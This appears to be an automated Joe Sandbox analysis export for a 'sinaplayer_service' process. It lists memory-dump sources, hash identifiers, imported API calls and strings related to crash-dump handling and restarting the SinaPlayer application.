                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: b82713ce0dddbd4f36ed4bbe17005e0e690b5cbb30b125b97f4530d2fc614921
                                                                                                                                                                                                    • Instruction ID: 78cd11f5bf377feb9ae04f6532f08a482919cdda9359293ebabe95997d1ea892
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b82713ce0dddbd4f36ed4bbe17005e0e690b5cbb30b125b97f4530d2fc614921
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 251104B1904709EFCB01CF19C801B9AFBF8FB44720F20826AE82597790D771A900CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010), ref: 003879BF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 003879DA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387A05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 0d1483b3abc81308d4dfd233c099e1be965beb95fa41dfd0ddbb90b7fd2f2bd5
                                                                                                                                                                                                    • Instruction ID: 83ed7e759db7dc73e2f2c1de2009cb5f79cdf3c0d6562ba596d0e1315c627f0f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d1483b3abc81308d4dfd233c099e1be965beb95fa41dfd0ddbb90b7fd2f2bd5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF1180B5904758DFCB11DF58C941B9ABBF8FB09B20F10866AEC2697790D7B4A900CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010), ref: 00389BBF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,?), ref: 00389BDA
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,?), ref: 00389C05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: f25087e26fa530a1b9998362935a23423e4da3d3cbbb7a0f6182a11c542dce85
                                                                                                                                                                                                    • Instruction ID: b100f6a219f4f480d4c8e13562e770967d7791f7a7c3fe7a2492219f00087621
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f25087e26fa530a1b9998362935a23423e4da3d3cbbb7a0f6182a11c542dce85
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F111C0B5914758DFCB12DF58D941B9ABBF8FB08B20F10866BEC2697780D374A900CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C), ref: 003804FF
                                                                                                                                                                                                    • ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?,8285FFAB), ref: 0038051A
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?,8285FFAB), ref: 0038053D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedSafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3025939394-0
                                                                                                                                                                                                    • Opcode ID: 0b641b61c049251822d2e903a91c75d33f5da02398a21ca9c3b26f4b432d2994
                                                                                                                                                                                                    • Instruction ID: 6da2441820c2ca70d73308ffefd0a57a77a45b595d4d273ec1c03b657d687310
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b641b61c049251822d2e903a91c75d33f5da02398a21ca9c3b26f4b432d2994
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5301B175914714EBCB11DF58D941B9ABBF8EB09B20F10466BEC2697780E7746904CBD0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ.BASE(8285FFAB,?,00000000,00000000,0039AEE3,000000FF,?,00382384,?), ref: 00386B28
                                                                                                                                                                                                    • ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,8285FFAB,?,00000000,00000000,0039AEE3,000000FF,?,00382384,?), ref: 00386B44
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@12@@Base@internal@base@@Base@subtle@base@@BindCallbackCountedRef@SafeStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 125946816-0
                                                                                                                                                                                                    • Opcode ID: 303d5ebf96e321f65dc30ac0c11eb1f06694587a1ba1665ec2e0f493b36ea90b
                                                                                                                                                                                                    • Instruction ID: 0ca0ec284b50bce014c0418134a5b5ab21767b37b5e0f8d9a2a288b98a13c052
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 303d5ebf96e321f65dc30ac0c11eb1f06694587a1ba1665ec2e0f493b36ea90b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C214471910B459FD721CF29C844B96BBF8FF1A720F108B1EE89697B90E7B5A544CB80
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6C5F4611,?), ref: 6C5F4811
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6C5F481A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037A181
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037A1A7
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A1E1
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037A21B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037A23B
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A258
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037A27B
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A28C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037A2A6
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037A2C7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A2DC
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A32D
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A339
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A345
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0037A359
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,?), ref: 0037A3C8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A3E1
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?,sinaplayer.exe,0000000E), ref: 0037A446
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037A45C
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 0037A467
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A486
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A492
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A4A7
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?,sinaplayer.exe,0000000E), ref: 0037A4F8
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037A520
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A530
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?,sinaplayer.exe,0000000E), ref: 0037A54F
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037A55E
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037A586
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A596
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A5A2
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A5AE
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A5C3
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A61B
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037A63E
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A678
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037A6B0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037A6D0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037A6ED
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037A710
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037A721
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037A73B
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,Function_00001D40), ref: 0037A765
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037A770
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037A791
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037A7A6
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A7F4
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A800
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037A80C
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0037A814
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037A827
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$File$Path@base@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$??3@?rdbuf@?$basic_ios@D@std@@@2@U?$char_traits@_V12@$?width@ios_base@std@@Name@V01@@$W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?sputc@?$basic_streambuf@CountCurrentD@std@@@1@@DebugOutputStringThreadTickV?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Append@Exists@base@@ExitModuleNameOsfx@?$basic_ostream@PathPath@1@@ProcessV?$basic_ostream@
                                                                                                                                                                                                    • String ID: path = $)#sinaclient#[$)- $--kill_service$RestartSinaPlayer$RestartSinaPlayer start failed ret = $open$sinaplayer.exe$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1485550632-3151481418
                                                                                                                                                                                                    • Opcode ID: 865019976461f972ff4d72ac035fcb8aa01f4e34fffb086a9c83bcd4f7715346
                                                                                                                                                                                                    • Instruction ID: df29b2f87dbcd55f5daef517d948b4ad4ca068256898f93e16fe7c4d793b18f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 865019976461f972ff4d72ac035fcb8aa01f4e34fffb086a9c83bcd4f7715346
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0127A71900218ABDF26DBA4DC4EBDDBBB8BB15304F0045E9E40DA7291EB755B88CF51

                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph of the function starting at 379460; nodes marked executed / not executed]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00376790: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,8285FFAB,00000000,00000000,00000000,00000000,0000006C,8285FFAB,00000000,0000003C,00000000), ref: 0037682D
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,dmp_temp,00000008,?,?,?,00000000,0000006C,8285FFAB,00000000,0000003C,00000000), ref: 00379523
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00379539
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379546
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379555
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(-00000054), ref: 0037955E
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037957D
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 00379592
                                                                                                                                                                                                    • ?CopyFileW@base@@YA_NABVFilePath@1@0@Z.BASE(?,00000000), ref: 0037959E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003795AE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003795B7
                                                                                                                                                                                                    • ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 00379604
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379633
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037966E
                                                                                                                                                                                                    • ?RemoveExtension@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037967E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003796CA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003796EF
                                                                                                                                                                                                      • Part of subcall function 003803D0: GetTickCount.KERNEL32 ref: 003803ED
                                                                                                                                                                                                      • Part of subcall function 003803D0: _time64.MSVCR120 ref: 003803F7
                                                                                                                                                                                                      • Part of subcall function 003803D0: UuidCreate.RPCRT4(?), ref: 00380410
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(00000000,00000000,000000FF), ref: 00379712
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037971B
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?,00000000), ref: 00379766
                                                                                                                                                                                                      • Part of subcall function 00374E40: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E5A
                                                                                                                                                                                                      • Part of subcall function 00374E40: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E7E
                                                                                                                                                                                                      • Part of subcall function 00374E40: memcpy.MSVCR120(?,?,00000000,?,00000000,?,?,?,?,00374F50,?,?,?,?,?), ref: 00374EC3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003797B2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003797D7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003797FC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000,00000000,000000FF), ref: 00379811
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,00000000,00000000,000000FF), ref: 00379827
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037983A
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379847
                                                                                                                                                                                                    • ?GetFileSize@base@@YA_NABVFilePath@1@PA_J@Z.BASE(?,?), ref: 00379875
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037989D
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?,00000000,0000006C,8285FFAB,00000000), ref: 003798C8
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003798EB
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00379925
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00379962
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00379982
